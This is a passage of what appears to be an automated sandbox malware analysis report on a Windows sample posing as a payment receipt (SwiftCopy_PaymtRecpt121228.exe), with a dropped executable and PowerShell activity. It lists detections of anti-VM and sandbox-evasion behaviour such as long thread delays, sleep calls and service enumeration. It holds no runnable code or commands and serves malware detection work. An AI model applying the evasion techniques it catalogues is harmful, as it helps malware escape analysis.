                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Delayed program exit found
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: 23E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: 2440000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: 8F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: 9F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: A1C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: B1C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: B610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: C610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMemory allocated: D610000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: 2A10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: 91A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: A1A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: A3B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: B3B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: BAD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: CAD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMemory allocated: DAD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198D2
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239828Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239718Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239609Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239499Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239390Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239281Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239172Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 239062Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238953Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238830Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238712Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238556Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238422Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 238285Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237937Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237669Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237562Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237453Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237342Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237234Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237119Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 237010Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239874Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239765Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239656Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239544Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239437Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239326Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239212Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239094Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238937Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238828Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238718Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238484Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeWindow / User API: threadDelayed 775Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeWindow / User API: threadDelayed 2467Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6682Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3045Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeWindow / User API: threadDelayed 9754Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeWindow / User API: threadDelayed 1161Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeWindow / User API: threadDelayed 1390Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeAPI coverage: 5.3 %
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeAPI coverage: 9.6 %
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238830s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238712s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238556s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238285s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237669s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237342s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237119s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237010s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7700Thread sleep time: -723000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7700Thread sleep time: -29262000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239874s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239765s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239656s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239544s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239437s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239326s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239212s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239094s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238937s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238828s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238718s >= -30000sJump to behavior
